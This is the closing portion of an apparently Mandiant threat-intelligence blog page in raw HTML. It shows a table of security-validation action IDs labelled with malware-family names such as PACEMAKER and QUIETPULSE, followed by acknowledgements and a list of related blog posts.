style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PULSEJUMP, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-607\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - HARDPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-608\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - SLIGHTPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-609\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - LOCKPICK, Patcher, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-610\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - LOCKPICK, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-611\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - ATRIUM, Patcher, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-612\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PACEMAKER, Launcher, Download, Variant #1\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd 
style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-613\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PACEMAKER, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-614\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - QUIETPULSE Utility, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-615\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - QUIETPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-616\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - STEADYPULSE, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-617\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - STEADYPULSE, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-618\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - ATRIUM, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-619\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - THINBLOOD, Download, Variant 
#1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-620\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - THINBLOOD, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-621\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PULSECHECK, Download, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA101-622\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eMalicious File Transfer - PULSECHECK, Download, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-757\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE Utility, Check, Variant #1\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-758\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE Utility, Check, Variant #2\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-759\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE Utility, Check, Variant #3\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:47.0588%\"\u003e\n\u003cp\u003eA104-760\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:52.9412%\"\u003e\n\u003cp\u003eHost CLI - QUIETPULSE 
Utility, Check, Variant #4\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003ch4\u003eAcknowledgements\u003c/h4\u003e\n\u003cp\u003eMandiant would like to thank the Stroz Friedberg DFIR and Security Testing teams for their collaboration with the analysis and research. The team would also like to thank Joshua Villanueva, Regina Elwell, Jonathan Lepore, Dimiter Andonov, Josh Triplett, Jacob Thompson and\u00a0Michael Dockry for their hard work in analysis and blog content.\u003c/p\u003e"]]]],[["Threat Intelligence","Seeing Through a GLASSBRIDGE: Understanding the Digital Marketing Ecosystem Spreading Pro-PRC Influence Operations","GLASSBRIDGE is an umbrella group of four different companies that operate networks of inauthentic news sites and newswire services.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,6,null,"https://cloud.google.com/blog/topics/threat-intelligence/glassbridge-pro-prc-influence-operations",null,1,[["Google Threat Intelligence Group "]],null,"55620"],["Threat Intelligence","Empowering Gemini for Malware Analysis with Code Interpreter and Google Threat Intelligence","When used for malware analysis, Gemini now has capabilities to address obfuscation, and obtain insights on 
IOCs.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,6,null,"https://cloud.google.com/blog/topics/threat-intelligence/gemini-malware-analysis-code-interpreter-threat-intelligence",null,1,[["Bernardo Quintero"],["Andr\u00e9s Ram\u00edrez"]],null,"55597"],["Threat Intelligence","Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation","Learn how Mandiant Red Team is using Gemini and LLMs for adversarial emulation and defense.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,25,null,"https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation",null,1,[["Mandiant "]],null,"55578"],["Threat Intelligence","Emerging Threats: Cybersecurity Forecast 2025","The Cybersecurity Forecast 2025 is here to arm security professionals with knowledge about the year 
ahead.",["https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-400x400.png 324w, https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png 648w"," 324px, 648px","https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplifie.max-700x700.png"],null,3,null,"https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025",null,1,[["Adam Greenberg","Content Marketing Manager, Mandiant"]],null,"55565"]],null,"Threat Intelligence",null,[["Threat Intelligence","https://cloud.google.com/blog/topics/threat-intelligence","threat-intelligence"],["Security \u0026 Identity","https://cloud.google.com/blog/products/identity-security","identity-security"]],null,null,31], sideChannel: {}});</script><script id="wiz_jd" nonce="-49Bz_4wsckd3k4vDG-wCQ">if (window['_wjdc']) {const wjd = {}; window['_wjdc'](wjd); delete window['_wjdc'];}</script><script aria-hidden="true" id="WIZ-footer" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.wiz_progress&&window.wiz_progress(); window.stopScanForCss&&window.stopScanForCss(); ccTick('bl');</script></body></html><footer id="ZCHFDb"><footer class="nRhiJb-RWrDld nRhiJb-yePe5c QJnbF" jscontroller="NsSboe" track-metadata-module="footer"><h3 class="nRhiJb-VqCwd-L6cTce">Footer Links</h3><section class="nRhiJb-haF9Wb r2W5Od"><section class="nRhiJb-DX2B6"><div class="nRhiJb-j5y3u"><h4 class="nRhiJb-BkAck nRhiJb-BkAck-OWXEXe-TzA9Ye">Follow us</h4><ul class="nRhiJb-Qijihe c3Uqdd" role="list"><li class="nRhiJb-KKXgde"><a class="nRhiJb-ARYxNe" href="https://www.x.com/googlecloud" target="_blank" rel="noopener" track-name="x"track-type="social 
link"track-metadata-position="footer"track-metadata-eventdetail="myaccount.google.com/termsofservice?hl=en-US"track-metadata-module="footer">Terms</a></li><li aria-hidden="true" class="glue-footer__global-links-list-item"><a aria-hidden="true" role="button" tabindex="0" class="nRhiJb-Fx4vi glue-footer__link glue-cookie-notification-bar-control" href="#" target="_blank" track-name="cookies management controls"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="#"track-metadata-module="footer">Cookies management controls</a></li></ul><ul class="nRhiJb-hlZHHf-PLDbbf nRhiJb-hlZHHf-PLDbbf-OWXEXe-hOedQd nRhiJb-di8rgd-ZGNLv qkxr1" role="list"><li class="glue-footer__global-links-list-item nRhiJb-hlZHHf-PLDbbf-rymPhb-ibnC6b-OWXEXe-hOedQd"><a class="nRhiJb-Fx4vi" href="https://support.google.com" target="_blank" track-name="help"track-type="footer link"track-metadata-position="footer"track-metadata-eventdetail="support.google.com"track-metadata-module="footer"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c nRhiJb-Bz112c-OWXEXe-yePe5c-h9d3hd" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 17h-2v-2h2v2zm2.07-7.75l-.9.92C13.45 12.9 13 13.5 13 15h-2v-.5c0-1.1.45-2.1 1.17-2.83l1.24-1.26c.37-.36.59-.86.59-1.41 0-1.1-.9-2-2-2s-2 .9-2 2H8c0-2.21 1.79-4 4-4s4 1.79 4 4c0 .88-.36 1.68-.93 2.25z"></path></svg>Help</a></li><li class="glue-footer__global-links-list-item nRhiJb-hlZHHf-PLDbbf-rymPhb-ibnC6b-OWXEXe-hOedQd"><select jsaction="change:xU0iy" aria-label="Change language" class="nRhiJb-CL4aqd-j4gsHd"><option value="" selected disabled hidden>Language</option><option value="en" selected>‪English‬</option><option value="de">‪Deutsch‬</option><option value="fr">‪Français‬</option><option value="ko">‪한국어‬</option><option value="ja">‪日本語‬</option></select></li></ul></section></footer></footer>
